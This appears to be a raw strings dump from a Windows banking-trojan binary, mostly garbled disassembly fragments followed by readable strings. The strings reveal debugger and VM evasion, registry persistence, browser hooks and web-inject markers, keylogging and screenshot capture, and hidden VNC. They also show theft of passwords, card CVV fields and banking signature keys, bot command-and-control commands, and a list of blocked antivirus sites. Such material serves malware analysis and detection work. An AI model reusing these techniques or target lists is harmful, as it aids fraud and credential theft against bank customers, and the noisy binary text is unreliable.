U<SVWj,D$ j
QQQQjWQQ
Mu_[t#EPVE
^]VB^]U0
DFu_^]U
u'MQMUREPj
u'URUEPMQj
SVW3hh
@u+S[u
VW3u5tds
_^U<SVW
E3EEEEEEj
;}r[3j
]EEEEEE
E3EEEEEEj
;}r[3j
]EEEEEE
E3EEEEEEj
;}r[3j
]EEEEEE
EPEQURWVP
@u+3@t(x
URUPMQWVR
@u+3@t(x
@uM+PE
SVWh$5
S%_^[U0
VPuuuuE
|U SS4
EPEMQURh
tyE$trj
M QWVS
t#E PSE
EPV&Vj
E_^[]$
^]_[3^]U
@SVWe3
;}rn]3E
]3EEEEEE
@uS+W^_
@u+tt0
t#URVE
MQURUMQj
@u+PVX
t#URSE
PEVuPEQSWRh
@u+Eo_
t#URVE
t#EPVE
t#MQVE
t#URVE
t#EPVE
tEPVE
tMQVE
tURVE
tEPVE
tMQVE
tURVE
tEPVE
tMQVE
tURVE
tEPVE
tMQVE
tURVE
tEPVE
tMQVE
tURVE
tEPVE
tMQVE
u9PPPh@
t#MQVE
t#URVE
_^3]UQVj
t#EPVE
SVW3Wj
9txQhPX
SVW3D$
t$0t$4t$dt$h$
t$Lt$P
;tZD$@P$
QT$`RD$0PW
L$$3L$
D$ PWt$(
t$8t$<t$Tt$Xt$tt$x$
;tQL$xQT$lRD$PPL$8QS
W<D:PPD$
t$Dt$Ht$|$
t$lt$pt$\t$`
D$4;tUT$PRL$dQT$xRL$DQP
;t(?SV
@uSV+W
UMQPPPh
@u+t"|
MQRURh?
@u+@PEVj
P_^[]U
EMPQDh
FMu_[^]
EEEEEEEF
V$PQj R
t:F(~2N
_^3[]3h
F4F(F,
j P}~$
<Nt <Ft
B;U|_^[]U SV~4
t2F(~*N
_^[]VW
;u_^3_^U
Vtct_WS
tEWSV
WV#WV|R
=GET t
=POSTu
E3EEEEEEj
;}r_3j
EEEEEE
=GET t
=POSTu
E3EEEEEEj
;}r[3j
]EEEEEE
E3EEEEEEj
;}r[3j
]EEEEEE
E 3EEEEEEEj
;ur^3j
EEEEEEE
VWPQSR
E3EEEEEEEj
;ur^3j
EEEEEEE
_^W3_UE
[]_2[]U,
L$8D$(}]
RD$@PS
8D$9u|$
D$;HD$
QT$@RS
~AD$8P
T$4D$,|$,t$4
j@L$\Q
uvT$XR
T$0D$4|$(t$4L$0
RD$LPW
QT$<RV
RD$LPW
u'MQMUREPj
u'URUEPMQj
MSVWPPQh
t#URVE
_^[]Ujh
MEPj@j
hPVFE3E
tPVF39
$PVF39
PVFMQV
EPj@QW:
URj@VS
UMQRVS
t#EPVE
Nu)9uu
V3tbSVVVVjPVV
<#t3<
t+<*t[
BFG;uE
r^_3[]
u)3t#U
F;r^3[]
33fEEfMEPMQU
t U+fE$fEM
tj;uad
@uVW+OO
@uW+OO
@u+PSr3h
@uVW+OO
@uVWh\
@uSVWh\
|_^3[]
t'VMQPE
jdUQVhx
@uVWh`
EEEUEEEfEU
EEEUEEEfEU
t#EPVE
@uSVW+OO
EEEUEEEfEU
EEEUEEEfEU
EEEUEEEfEU
3EEEEEEEfEEE
EEEUEEEfEU
3EEEEEEEfEEE
@uSVW+O$
3FVRhd
|_^3[]
@uVW+OO
SVW=XR
l$_^[]U
@u|$(+OO
@u|$(+OO
@u|$(+OO
@u|$(+OO
@u+P$t
PD$02D$
SP\$$x
@u+P$$
_^[]US]
up3;tNVVShP
P_^3[]
t#URVE
?POSTuZ
t#EPVE
@u|$(+OO
@u|$(+OO
PL$,Q5
@u|$(+OO
@u|$(+OO
@u+P$t
_^]Qhh
@uVWhl
@u+PV3h
@uSVWhl
|_^3[]
t'VMQPE
^]UQSVW=XR
a_^3[]U
@uSVW+O$
3FVRhd
|_^3[]
@uSVWhp
UQSVW=XR
_^3[]U
@uVW+OO
^]_[3^]U3$9E
3EEEEE
@uSVWht
|_^3[]
t'VMQPE
3SVWD$
3VVVVjWVV
P3St$ t$$
VVSt$(
3QQQ3PS
@uSVWhx
@u+PVs3
@uSVWhx
|_^3[]
UQSVW=XR
_^3[]U
SV3Wt$
D$ PWt$(t$,
SD$(D$$j
3QQQ3PW
_^[]U$
@u+PS$
@uSVWh|
|_^3[]
UQSVW=XR
_^3[]U
@u+PVe_^[]
@u+PRmc_^[]U
@uSVWh
|_^3[]
3^]3]UQSVW=XR
_^3[]U
uEVPPPh
@uSVW+O$
3FVRhd
|_^3[]
3^]UQS
UQSVW=XR
a_^3[]U
@uSVWh
|_^3[]
@uVW+OO
@uW+O$
@uSVWh
|_^3[]
@uVW+OO
_^t9HH
@u+PQI_^[]U
@uVW+OO
@u+PV7Eh
@uSVWh
|_^3[]
Hjd?UQS
@uSVWh
|_^3[]
Hjd?U,
.iniPj
@u+PRb<h@
_^3[]U
@u+PQ9_^[]U
@u+PV:8_^[]
@u+PV*6j
t#EPVE
@u+PS2E@E;E
u[E<C3
@u+PRT1hp
UQSVW=XR
a_^3[]U
UQSVW=XR
a_^3[]U$SVWPj
8ADVAu
E_^[]U(SVu
;t@EPMQUREPS
MQPPPh
@u+t|
@u+@PESj
URMEPh?
@uM+@PWj
SVW3h$
EPQRWV
URUPWQR
;|}u[(j
SVWEPh
EMQVURj
t)t%Vj
_^3[]_^[]U
URtPEPW
tEW5\3?
u[_^]U
URtPEPW
tEW4[3?
u[_^]U
t.u:ERPltEP
RV [=P
3EEEEEEEj
E]UXVE
VE3SSE
SSVQRSSW
};tuh
3PSPPPQW
?[_3^]
fEBME6
SVW3h
mE_^[]U4
VW3EPWWj
uzMQURPEP
uc9}t^uti=U
tIEMQURj
_^]UQE
|_^[]U
MEUEE(|
G@;|ME
3A}u]=
]f:M}U
]uu_^[]U SV3H
DU@fDU3
Mu_^[]
S3V]]9,
_^[]UQj
u3]UQj
;F u!N$t
f9UuHEH49Mv=j
2UQS3W8^$u
t#EPWE
;t-MQWE
S3VW^P^X^T^L^D^d^H;u
_^[]SSj
E;t-];t
E_^[]_FT
^3[]U S3W^P^X^T^L^D^d^H;
u2F<PN0QFDPV,R;u}SSSW
~P3_[]
EPMQUR
F<^0^4^8~P3_[]
_[]U$S3
EP^P^X^T^L^d^HF,
EPMQUR
^0^4^8F<3[]UE
Wt=F`~\;sr+;v
oFL_[]
7FL_[]
t,W~Pt#EPWE
UQSVW^hS
t&t!WS;u#
E_Fd^3[]_^
{PSXCT
{L{d{H{\{`
C0UEC0
x9SLKD
K(_^[]
USVW=P
3;t+hp@
^$^(^P
u,8^$u'E
;t#VSP
T$LRQPD$
L$\QWh
u_^2[]
P.@/H<H@HDP,
fP0fP2@4
fp0fp2fp4^:t
H8[f@6
[UQSVhP
MQVLR4
EF0W~,EG
CPCTEt
_^[ULSVW=
;|++Fd+
Vh;|*+Fl+
~%FtNp
VPFxQFl
MVfFEFEN&F
Ou_^[]
EM;thu
?;u_[^]
9t5V$
W9;t7E
QRt6?;u;u
G6;u_^[]
u[^V7>
QPV]8W
M;~n;~
QR@u*G
RPt&9w
V_^[]
;UuM^;|
SWPQ_[]j(
;u^US]
VPQK|W
fEfuf}u
UUEEM;M}
EEfMfM
UUfEfE
MMfUfU
EEfMfM
E9E}3MM
MMUUE;E}
UUfEfE
MMfUfU
EEfMfM
UUfEfE
U9U}5EE
MMUUE;E}
UUfEfE
MMfUfU
EEfMfM
UUfEfE
U9U}3EE
fMfuf}
QPV{t@u
U0SV5R
EUPURQ
@uM+QE
j({$C(
f{*C,C0C4`v
CL{P{TV
RPWWj(CX
C)_^[]
r.N;s!
}RFB u
USVWjA
fP,H0P4
*fffff
;t9p$u
HLVW0u
3@fEfUu
HXVW0u
@u+@fEu
SVW3h<
`WQ\Ws
@uT+OO
@u+@PLQPRj
S33_^[]
j,\QRp
@PQPRj
33_^[]
MQWRW@P}}
2_^[]E
UIPSE5
Mu!E;s
ME@E }}}NEj
_^[]_^
@u+@PDQPRj
UPQR\h
MQWSP.UR<P
U$SVWj
V_^[]j
E3F,^+Tv
VMQUREPE
RPQ0F\WP
NXWQ[VLWRQW
R_^[]j
Ft^x_^[]
Ft^x_^[]
Nx_^[]j
EMPEQMPQV_^[]j
fUfMfU
QRV_^[]j
URV_^[]j
_^[]fU
VXFLRPM
]t8E;|
FLPWNF\PWu\O
FLPV\RPEnF\P
}SWNSxFPNT]
VLFXRP
NXSQ{VXWRq~\
3FPFT8Ev
3P]MQE,tq
URMQW}Uge
MUB~4x
A~0UR@
3P]=MQEqtpEU
MQMQR}Ud
MQMQR}Uc
EGu]}G
t%;~!]
U;tUREPW}
ERQWPVM9RQWPVS
-RQWPVv
tY}MQP
QLURCE_^[]
fMfMfMfMfEfM
fuf}fEu
;r'J;s
;r,J;s!
;r,J;s!
SV3tG\
@;r1Q;s#$
@Q;rIM
@;r,Q;s
@Q;rIM
@;r3Q;s%
@Q;rIEH
4fVI"T6
CE_^[]
r.J;s!
uJ~F=U
u[URPj
u{UR3VPVO
QSP_^[]
6_^2[]
QPVt@u
333;;s&K
;|_^[]
@A;ru$N
+U S]$~1V
+U S]$~/
333;3s)8C
3~;+Wd$
F@;|_^[]
A;rU$J
+U W}$~5S
+U W}$~3
333;:s,8B
F@;|_^[]
A;rU$J
+U W}$~3S
+U W}$~1
333;s)8G
GW;}rEM U$
~C4vSu
@W} M
E;shd$
;]ruE$
z_^[]
~<V4X;s%:]
f<{fx;r}
~M;sdE
f~;ur} EM$
@W} u 4F
;]rE$M
z_^[]
] ;sP2M
;]ru}E$
m_^[]
~:V4;s#:]
~;ur} EM$
@W} u
;]rE$M
E ~ S]
P,SWx,:
:X/u\tHf
f;X0uKf
f;X2u>f
f;X4u1
_[F|05
VUUUm
B<J<tI
_PVR_U
p2_^[]
Eu3~$}u
s?E3~$}u
S3;tkW=
tF ;t
^$_[U4S
fuIf9G
u+8F/t&
M3Ef;O
uf;srM3ME
@E;|_^[]
EMu_^[]UdE
F4E3E9E
#u#}#EMMM
#]E#E#UMMME
;E|EMU
{g_tBE
MUPEQRPbE
P]V[^[]
KXQ]V[^[]
SPQVt%F4+
F0W;~8M
SQPVxt
VPQK|W
fEfuf}u
UUEEM;M}
UEEMMUUEE
U9U}3EE
MMUUE;E}
MUUEEMMUU
M9M}5UU
PoE_^]
MMUUE;E}
MUUEEMMUU
M9M}3UU
EUREPV}U
MMMM9M
3It-It%
EM#E#U
E#]3M#EM
Ht9Ht.
t"3~03I
;|_^[]
USVWhP
P,S,P0S0P4S4@8QC8
V2W8Tv
i3_^]E
xi3_^]_^]U
hrL=8}
5hL=8}
3:_3^J
U;Us$E
M}!wU
MUUE;Er
+EEM;M
)2_^[]
3fu&fE
URMQURMQ
ERUQMRPQRS
O_^2[]
MMUUE;E}
E9E}3MM
UREPUREP
f;Et@;
EQMRUPQRPS
ulMUQREE
EEMMU;U}
E9E}5MM
UQSVWE
_f2^[]
UREPUREPE
MUPEQMRUPQRS
EEMMU;U}
U9U}3EE
UQSVWE
^F^[]F$
^[]UQ=]
Ht-HuF93
#__{UQSVWj
V_^[]J;s!
uL~H=U
F(9F$u
wN(V Wh
GLHGT7G
WXF(N h
G8F(N RP
G@F(N RP
V(PF R
9W8tG9W@tB9WDt=;t9
V3;t`P
;tY9p tT9p$tOp
_^U3V;
S^(>N(*
u0F([3^]
[F(3^]
*t(Et#It
N$PF(P
N$PF(P
N$PF(P
N$PF(P
F(N$RP3q
F,NLVD
F<3fDJNLFDWT
~l~\~t~h~HV|FxF`_U
WlG|O8SV
Gp;U}+\
]U_4#]
(Ot^[;v
}^<+^tFlN,+
];r^F8W
VLFD)~p)~l
3#FTFH
N<;sj~l
_[]UQSVu
FlN\EVlFt
Nl>N\G
V\NlF,+-
Nl>N\G
s"QFt]
rjFHNXVl~4N8
3#FTND#V@FHf
zNl#N4V@
JNHVDf~lf<Jt
PhF`~`
fNlf+Np
)FtNt]
rZHF`$
~lVlN8
^HNXND3#FT^4FH
FlNHVDf
VlNXF`
3#FTFH`VlF8
3Vl+RP3
Fl>F\G
D_^3[]
rIFHNXVl~4N8
3#FTND#V@FHf
zNl#N4V@
JNHVDf~lf<JN`Vp
NxVd^`tO;
sGVlN,+
fVlf+VdFxf+
^lVl;w>FHNX^4N8
3#FTNDFH
FlNHVDf
Nl>N\G
f_^3[]
3Vl+RP3
Fl>F\G
NlNtNhl~h
tFVlF8D
FlUNlF8
3Vl+RP3
Fl>F\G
USVW~t
3+PQ3?
Fl>F\G
Em@@E;E|u
UEM@@ME;
r$E@;F
RSWjEFE;u
GE;s3+M
OM;s0+
|E@E;E
;Er_^[]
PG|,QR
PEQRPhH[
UEM@@ME;
GE;s3+M
OM;s0+
PQSRN}
|E@E;E
;Er_^[]
PG|,QR
PEQRPhH[
UEM@@ME;
GE;s1+U
GE;s)+
U;UrE@E;E
;Er_^[]
PG|,QR
PEQRPhH[
UEM@@ME;
3EEfBff
GE;s1+U
GE;s)+
U;UrE@E;E
;Er_^[]
PG|,QR
PEQRPhH[
UEM@@ME;
3EEfBff
uS4u;sg
;r[_^]
E;s4+U
RPSQR3
UM;slJ
H9EuwE
;EsoMI
;ErMAM;M
M;s0d$
;Er_^[]
?_^3[]
PG|,QR
PEQRPhH[
UEM@@ME;
3U~\d$
u#UB;V
uS4u;sh
;r[_^]
E;s4+U
UM;smJ
H9EuvE
;EsnMI
;ErMAM;M
;Er_^[]
?_^3[]
PG|,QR
PEQRPhH[
UEM@@ME;
3U~\d$
u#UB;V
PG|,QR
PEQRPhH[
UEM@@ME;
;]r_[]
PG|,QR
PEQRPhH[
UEM@@ME;
;]r_[]
PG|,QR
PEQRPhH[
UEM@@ME;
r$E@;F
PG|,QR
PEQRPhH[
UEM@@ME;
r$E@;F
fEC,fuEu
_^2[]
H H(H,H0H8H<J
HlHPHL
O$PG(PF4
^P^SW3;u
_(9_$u
G(O Vh
W(G$VRG
^_[US]
Wu)N$S
F0F,V(+{
F(;r)K
V4P+QR6
+WPF4P6
~0_N,^3[]
^09F0u
N,_^3[]
UEMRPQ
Oh;O\sPI
fLWpGhOh
3fTOpGh9Ghr
+OhfTOpGhB
E;r+Oh
WhMfLWpGh}
G`POpQj
GlOlGP
RW`GXPQOd
QDWpPj
OHtE;s'
OHt@;s"}
U+UOD;vI+
M+MW@M
}+9Mt$U
t,N$t%@4t
V(F$QRF
?}tTM\
J}u_^[]U Vu3
4Bft5f
DU@fDU3
Mu_^[]
IRj_[]
@PAQBR
U]tz+4@m
+;~PffH
+;~VffH
^8^<^@@Jt
_^3[_^[
F$V(RLu
[_2[UU
C$S(KuT{(
U<SVWM
H4UPLM
HPUMHT
HXEx<E
u^;s?+
U9Us?;us:U
Ex<_^X8Q
EEEEEEEE3t
FfDMLM@;r
3t&f<F
FfDUTU@;r
tEHtExc
U<_^[]
#u#u;u
;Us"tU
UVWS|$
+t~:D5
uX[_^]
name.key
\secrets.key
sign.key
kernel32.dll
CreateFileW
\explorer.exe
GetFileAttributesW
user32.dll
GetWindowTextA
OLLYDBG
wireshark.exe
dumpcap.exe
idag.exe
vmwaretray.exe
\\?\globalroot\systemroot\system32\vmx_fb.dll
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
SystemDrive
Software\Microsoft\Windows NT\CurrentVersion
InstallDate
SYSTEM
%s!%s!%08X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
userinit
software\microsoft
Global\
\svchost.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|
\winlogon.exe
sysinfo.log
scr.bmp
minidump.bin
%d.%d.%d.%d
%dd %dh %dm
CLOSED
LISTEN
SYN_SENT
SYN_RCVD
FIN_WAIT1
FIN_WAIT2
CLOSE_WAIT
CLOSING
LAST_ACK
TIME_WAIT
DELETE_TCB
netstat
{Proto
Local address
Remote address
taskmgr
Process name
[System Process]
netuser
Software\Microsoft\Internet Explorer\TypedURLs
IE history:
DAN NLD NLB ENU ENG ENA ENC ENZ ENI FIN FRA FRB FRC FRS DEU DES DEA ISL ITA ITS NOR NON PTB PTG SVE ESP ESM ESN TRK PLK CSY SKY HUN RUS GRE ALL
{BotVer:
{Process:
{Username:
PROCESSOR_IDENTIFIER
{Processor:
{Language:
%dx%d@%d
{Screen:
dd:MMM:yyyy
{Date:
HH:mm:ss
{Local time:
%c%d:%02d
{GMT:
{Uptime:
{Windows directory:
{Administrator:
links.log
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
avast.com
kaspersky
eset.com
antivir
virustotal
virusinfo
z-oleg.com
kltest.org.ru
trendsecure
anti-malware
.comodo.com
google.com
Dnsapi.dll
DnsQuery_A
DnsQuery_UTF8
DnsQuery_W
Query_Main
ws2_32.dll
getaddrinfo
gethostbyname
inet_addr
qwrtpsdfghjklzxcvbnm
eyuioa
1676d5775e05c50b46baa5579d4fc7
!verif
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9
6d3ad29879a90b4dd1b4f76e82166ca3
data.txt
ntdll.dll
ZwQuerySystemInformation
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_%08x
explorer.exe
Shell_TrayWnd
00000000000888888888@@@@@@@@HHHHHHHHPPPPPPXXXXXXXXXXXX`````hhhhhhhhhhpppppppppxxxxxxxxxx
000000000000000000000000@@@@@@@@@@@@@@@@PPPPPPPPPPPPPXXXXXXXXXXXhhhhhhhhhhhpppppppppxxxxxxxxxxxx
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
jHqA}
kdzbeO\
iLA`rqg
@l2u\E
a=-fAv
\cQkkbal
eLXaMQ:t
jiCn4Fg
c;d>jm
i]Wbgeq6l
8ROggW
A`Ugn1yiFa
fo%6hRw
[&wowG
eibkaEl
`MGiIwn>Jj
)WTg#.zfJa
h]+o*7
taskmgr
default
DefWindowProcW
DefWindowProcA
DefDlgProcW
DefDlgProcA
DefFrameProcW
DefFrameProcA
DefMDIChildProcW
DefMDIChildProcA
CallWindowProcW
CallWindowProcA
RegisterClassW
RegisterClassA
RegisterClassExA
RegisterClassExW
PeekMessageW
PeekMessageA
OpenInputDesktop
OpenDesktopA
OpenDesktopW
SwitchDesktop
MessageBeep
FlashWindowEx
GetCursorPos
SetCursorPos
GetMessagePos
SetCapture
ReleaseCapture
GetCapture
Winmm.dll
PlaySoundW
PlaySoundA
sndPlaySoundW
sndPlaySoundA
Kernel32.dll
Gdi32.dll
SetDIBitsToDevice
SetThreadDesktop
static
Content-Length
http://
NSS layer
https://
Referer
Content-Type
HTTP/1.
Transfer-Encoding
chunked
Connection
Proxy-Connection
identity
Accept-Encoding
If-Modified-Since
nspr4.dll
PR_Write
PR_Read
PR_Close
PR_OpenTCPSocket
PR_GetError
PR_SetError
PR_GetNameForIdentity
UserAgent
[[[URL: %s
Process: %s
User-agent: %s]]]
Accept-Encoding:
Crypt32.dll
CertVerifyCertificateChainPolicy
Wininet.dll
HttpSendRequestA
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExW
InternetQueryDataAvailable
InternetReadFile
InternetReadFileExA
InternetReadFileExW
InternetCloseHandle
set_url
data_before
data_end
data_inject
data_after
microsoft.public.win32.programmer.kernel
\iexplore.exe
keygrab
%02u.bmp
***************************
***************************
[/pst]
GetClipboardData
\\.\PhysicalDrive%u
AppEvents
Console
Control Panel
Environment
Identities
Software
System
/topic.php
keylog.txt
passwords.txt
%s%u.zip
-----------------------------
Content-Disposition: form-data; name="pcname"
-----------------------------
Content-Disposition: form-data; name="file"; filename="report"
Content-Type: text/plain
RtlUniform
TranslateMessage
GetMessageA
GetMessageW
as743vgk0odastr
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://www.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
www.bing.com
www.microsoft.com
Content-Length:
RtlFreeHeap
id=1&post=%u
frd.exe
!kill_os
&ret_val=ok
/faq.php
!activebc
&activebc=ok
!deactivebc
&deactivebc=ok
&load=ok
!inject
&inject=ok
!new_config
&config=ok
id=%s&ver=4.2.5&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d
\chrome.exe
--no-sandbox
\java.exe
\javaw.exe
\javaws.exe
\opera.exe
\firefox.exe
\maxthon.exe
\avant.exe
\mnp.exe
\safari.exe
\netscape.exe
\tbb-firefox.exe
\frd.exe
\isclient.exe
\ipc_full.exe
\intpro.exe
\cbsmain.dll
\clmain.exe
\core.exe
\rundll32.exe
\notepad.exe
%s.dbf
%s.DBF
j_username=
j_password=
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edUserLogin=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
action=auth&np=&login=
CryptoPluginId=AGAVA&Sign
login=
password=
&ctl00%24MainMenu%24Login1%24UserName=
&ctl00%24MainMenu%24Login1%24Password=
advapi32.dll
CryptEncrypt
WSASend
WSARecv
name=%s&port=%u
/home.php
A B V G D E E J Z I Y K L M N O P R S T U F H C CHSHSH Y E YUYAA B V H G D E JE J Z Y I YI J K L M N O P R S T U F X C CH SH SH YU YA
path.txt
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\%02d.bmp
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
\private\
private.txt
\public\
public.txt
\*.key
\self.cer
\@rand
\ABONENTS*
crypto
self.cer
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.zip
path_ctunnel.txt
found.
header.key
keys99
\header.key
masks2.key
\masks2.key
masks.key
\masks.key
\name.key
primary2.key
\primary2.key
primary.key
\primary.key
keys99.zip
path99.txt
\crypto\
\micros~\crypto\
\maxthon3\public\
\microsoft\crypto\
\crypto pro\
\progra~1\crypto~1\
\temporary internet files\
:\users\public
\ryptopro
\cryptokit\
:\progra~1\common~1\crypto~1
bsi.dll
&cvv=&
&cvv2=
&cvv2=&
&cvc=&
&domain=letitbit.net&
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
FAKTURA
sks2xyz.dll
vb_pfx_import
Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
BEGIN SIGNATURE
END SIGNATURE
secret.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
inter.zip
interpro.ini
DefaultPrivateDir
General
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
&txtSubId=
&txtPin=
ebank.laiki.com
pass.txt
Local\{EAF339BF-89ea-4fe1-9A0D-95CD39DC0214}
OFFSHORE
w.qiwi.ru
phone=
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
RCN_R50Buffer
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
client.zip
path_client.txt
\SIGN1\
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
RSTYLE
Agava_Client.exe
UseToken
Containers
KeysDiskPath
Agava_Client.ini
Agava_keys
keys_path.txt
stf.zip
mespro.dll
AddPSEPrivateKeyEx
core.exe
data\id.dbf
\data\id.dbf
keys%i.zip
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
login.yota.ru
IDToken1=
IDToken2=
YotaConfirmForm%5Bpassword%5D
pass2.txt
Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}
IsWow64Process
*SYSTEM*
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_
kernel
waveOutOpen
winmm.dll
1234567890QWERTYUIOPASDFGHJKLZXCVBNM
ct_init: length != 256
ct_init: dist != 256
ct_init: 256+dist != 512
inconsistent bit counts
not enough codes
too many codes
bad compressed size
ct_tally: bad match
bad d_code
invalid length
output buffer too small for in-memory compression
bad pack level
insufficient lookahead
no future
wild scan
more < 2
RFB 003.006
LibVNCServer 0.9.7
unknown
%s (%s)
My Documents
Network Favorites
%02d/%02d/%04d %02d:%02d
No authentication mode is registered!
Your viewer cannot handle required authentication methods
password check failed!
SCardConnectA
SCardEstablishContext
SCardFreeMemory
SCardDisconnect
SCardListReadersA
SCardReleaseContext
WinSCard.dll
IsNetworkAlive
SensApi.dll
GetTcpTable
IPHLPAPI.DLL
MiniDumpWriteDump
dbghelp.dll
strstr
calloc
malloc
_snprintf
_strrev
strtol
isdigit
sprintf
strncpy
fwrite
realloc
fclose
isprint
strchr
MSVCRT.dll
GetModuleFileNameExA
PSAPI.DLL
NetApiBufferFree
NetQueryDisplayInformation
NETAPI32.dll
DnsFlushResolverCache
DNSAPI.dll
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersA
InternetSetStatusCallback
InternetQueryOptionA
InternetConnectA
InternetReadFile
HttpOpenRequestA
InternetCheckConnectionA
HttpSendRequestA
InternetOpenA
InternetCloseHandle
WININET.dll
WS2_32.dll
SHGetFolderPathA
ShellExecuteA
ExtractIconExA
SHFileOperationA
SHGetSpecialFolderPathA
SHELL32.dll
StrStrIA
PathFileExistsA
PathFindFileNameA
PathAddBackslashA
StrStrIW
StrToIntA
PathMakeSystemFolderA
PathAppendA
StrCmpNIA
StrNCatA
StrStrA
StrChrIA
SHLWAPI.dll
RtlImageNtHeader
RtlCreateUserThread
ntdll.dll
GetVolumeInformationA
GetSystemWindowsDirectoryA
GetModuleFileNameA
GetLastError
SetLastError
GetProcAddress
GetModuleHandleA
IsDebuggerPresent
GetTickCount
GetEnvironmentVariableA
GetCurrentProcess
AddVectoredExceptionHandler
GetCurrentThreadId
GetCurrentProcessId
GetSystemDefaultLangID
Process32First
GetTimeFormatA
GetDateFormatA
OpenProcess
GetTimeZoneInformation
Process32Next
CreateToolhelp32Snapshot
WaitForSingleObject
LoadLibraryExA
ReleaseMutex
lstrcpynA
GetTempFileNameA
WaitForMultipleObjects
GetTempPathA
GetSystemTime
CreateFileA
SetFilePointer
MoveFileExA
SetEndOfFile
SetFilePointerEx
UnlockFile
LockFile
WriteFile
IsBadWritePtr
ReadFile
CreateDirectoryA
GetFileSizeEx
FindFirstFileA
RemoveDirectoryA
SetFileAttributesA
FindClose
FindNextFileA
DeleteFileA
HeapReAlloc
HeapAlloc
HeapFree
ExitProcess
SetErrorMode
SetEvent
OpenMutexA
lstrcpyA
MapViewOfFile
UnmapViewOfFile
IsBadReadPtr
CreateFileMappingA
GlobalLock
GlobalAlloc
CreateProcessA
MultiByteToWideChar
GlobalUnlock
GlobalFree
CreateThread
HeapCreate
lstrcmpiA
OpenEventA
lstrcmpiW
OpenFileMappingA
CreateMutexA
GetComputerNameA
lstrlenA
CreateEventA
GetVersionExA
ResetEvent
GetCommandLineA
InitializeCriticalSection
LeaveCriticalSection
EnterCriticalSection
GetCurrentThread
GetDriveTypeA
SetThreadPriority
SetCurrentDirectoryA
GetLogicalDriveStringsA
CopyFileA
GetCurrentDirectoryA
GetProcessHeap
HeapValidate
HeapSize
GetCommandLineW
ExitThread
MoveFileA
WinExec
TerminateThread
FindNextChangeNotification
FindFirstChangeNotificationA
lstrcmpA
CloseHandle
FlushInstructionCache
InterlockedExchange
VirtualAlloc
GetThreadPriority
VirtualProtect
WideCharToMultiByte
GetVersionExW
GetFileAttributesA
GetFileAttributesW
GetShortPathNameA
GetPrivateProfileStringA
VirtualQuery
VirtualFree
CreateRemoteThread
GetProcessTimes
Module32First
GetHandleInformation
VirtualAllocEx
LoadLibraryA
Module32Next
LocalFree
WriteProcessMemory
SwitchToThread
FileTimeToDosDateTime
GetFileSize
SystemTimeToFileTime
GetLocalTime
LocalAlloc
GetFileType
GetFileInformationByHandle
FindFirstFileW
FileTimeToSystemTime
CreateFileW
lstrlenW
FindNextFileW
KERNEL32.dll
CharUpperA
FindWindowA
GetSystemMetrics
SetCaretBlinkTime
SetThreadDesktop
GetThreadDesktop
ReleaseDC
GetShellWindow
GetWindow
DestroyIcon
SetClipboardData
OpenClipboard
GetDesktopWindow
EmptyClipboard
GetIconInfo
RegisterWindowMessageA
SendMessageA
WindowFromPoint
DrawIcon
CreateDesktopA
GetTopWindow
CloseClipboard
SendMessageW
IsWindowVisible
IsWindow
GetLastActivePopup
PostMessageW
IsIconic
MapVirtualKeyW
IsRectEmpty
GetClassLongA
GetWindowThreadProcessId
MapWindowPoints
PostMessageA
GetMenuItemInfoA
SetWindowPos
SendMessageTimeoutA
